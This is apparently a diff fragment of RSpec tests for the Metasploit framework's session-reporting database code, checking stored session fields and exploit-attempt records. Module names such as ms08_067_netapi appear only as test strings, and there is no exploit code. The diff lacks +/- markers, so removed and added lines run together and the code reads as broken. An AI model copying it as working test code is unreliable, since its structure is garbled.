it { expect(subject.last_seen).to be_within(1.second).of(Time.now.utc) }
it { expect(subject.local_id).to eq(session.sid) }
it { expect(subject.opened_at).to be_within(1.second).of(Time.now.utc) }
it { expect(subject.platform).to eq(session.platform) }
it { expect(subject.routes).to eq([]) }
it { expect(subject.stype).to eq(session.type) }
it { expect(subject.via_payload).to eq(session.via_payload) }
context "with session.via_exploit 'exploit/multi/handler'" do
it "should have session.via_exploit of 'exploit/multi/handler'" do
session.via_exploit.should == 'exploit/multi/handler'
end
context "with session.exploit_datastore['ParentModule']" do
it { expect(subject.info).to eq("Exploited by #{parent_module_fullname} to create Session #{mdm_session.id}") }
it { expect(subject.name).to eq(parent_module_name) }
it "should have session.exploit_datastore['ParentModule']" do
session.exploit_datastore['ParentModule'].should_not be_nil
end
it { expect(subject.via_exploit).to eq(parent_module_fullname) }
end
end
context "without session.via_exploit 'exploit/multi/handler'" do
let(:reference_name) do
'windows/smb/ms08_067_netapi'
end
before(:each) do
reference_name = 'windows/smb/ms08_067_netapi'
path = File.join(
parent_path,
'exploits',
@ -287,176 +483,12 @@ shared_examples_for 'Msf::DBManager::Session' do
session.via_exploit = "#{type}/#{reference_name}"
end
it { expect(subject.info).to eq("Exploited by #{session.via_exploit} to create Session #{mdm_session.id}") }
it { expect(subject.name).to eq(reference_name) }
end
context 'with RPORT' do
let(:rport) do
# use service.port instead of having service use rport so
# that service is forced to exist before call to
# report_service, which happens right after using rport in
# outer context's before(:each)
service.port
it "should not have session.via_exploit of 'exploit/multi/handler'" do
session.via_exploit.should_not == 'exploit/multi/handler'
end
let(:service) do
FactoryGirl.create(
:mdm_service,
:host => host
)
end
it { expect(subject.service).to eq(service) }
it { expect(subject.via_exploit).to eq(session.via_exploit) }
end
context 'without RPORT' do
it { expect(subject.service).to be_nil }
end
end
context 'created Mdm::ExploitAttempt' do
let(:rport) do
nil
end
before(:each) do
Timecop.freeze
session.exploit_datastore['RPORT'] = rport
report_session
end
after(:each) do
Timecop.return
end
subject(:exploit_attempt) do
Mdm::ExploitAttempt.last
end
it { expect(subject.attempted_at).to be_within(1.second).of(Time.now.utc) }
# @todo https://www.pivotaltracker.com/story/show/48362615
it { expect(subject.session_id).to eq(Mdm::Session.last.id) }
it { expect(subject.exploited).to be_truthy }
# @todo https://www.pivotaltracker.com/story/show/48362615
it { expect(subject.vuln_id).to eq(Mdm::Vuln.last.id) }
context "with session.via_exploit 'exploit/multi/handler'" do
context "with session.datastore['ParentModule']" do
it { expect(subject.module).to eq(parent_module_fullname) }
end
end
context "without session.via_exploit 'exploit/multi/handler'" do
before(:each) do
session.via_exploit = parent_module_fullname
end
it { expect(subject.module).to eq(session.via_exploit) }
end
end
end
context 'returned Mdm::Session' do
before(:each) do
Timecop.freeze
end
after(:each) do
Timecop.return
end
subject(:mdm_session) do
report_session
end
#
# Ensure session has attributes present so its on mdm_session are
# not just comparing nils.
#
it 'should have session.info present' do
session.info.should be_present
end
it 'should have session.sid present' do
session.sid.should be_present
end
it 'should have session.platform present' do
session.platform.should be_present
end
it 'should have session.type present' do
session.type.should be_present
end
it 'should have session.via_exploit present' do
session.via_exploit.should be_present
end
it 'should have session.via_payload present' do
session.via_exploit.should be_present
end
it { expect(subject.datastore).to eq(session.exploit_datastore.to_h) }
it { expect(subject.desc).to eq(session.info) }
it { expect(subject.host_id).to eq(Mdm::Host.last.id) }
it { expect(subject.last_seen).to be_within(1.second).of(Time.now.utc) }
it { expect(subject.local_id).to eq(session.sid) }
it { expect(subject.opened_at).to be_within(1.second).of(Time.now.utc) }
it { expect(subject.platform).to eq(session.platform) }
it { expect(subject.routes).to eq([]) }
it { expect(subject.stype).to eq(session.type) }
it { expect(subject.via_payload).to eq(session.via_payload) }
context "with session.via_exploit 'exploit/multi/handler'" do
it "should have session.via_exploit of 'exploit/multi/handler'" do
session.via_exploit.should == 'exploit/multi/handler'
end
context "with session.exploit_datastore['ParentModule']" do
it "should have session.exploit_datastore['ParentModule']" do
session.exploit_datastore['ParentModule'].should_not be_nil
end
it { expect(subject.via_exploit).to eq(parent_module_fullname) }
end
end
context "without session.via_exploit 'exploit/multi/handler'" do
before(:each) do
reference_name = 'windows/smb/ms08_067_netapi'
path = File.join(
parent_path,
'exploits',
"#{reference_name}.rb"
)
type = 'exploit'
# fake cache data for ParentModule so it can be loaded
framework.modules.send(
:module_info_by_path=,
{
path =>
{
:parent_path => parent_path,
:reference_name => reference_name,
:type => type,
}
}
)
session.via_exploit = "#{type}/#{reference_name}"
end
it "should not have session.via_exploit of 'exploit/multi/handler'" do
session.via_exploit.should_not == 'exploit/multi/handler'
end
it { expect(subject.via_exploit).to eq(session.via_exploit) }
end
end
end
@ -641,4 +673,4 @@ shared_examples_for 'Msf::DBManager::Session' do
end
end
end
end
end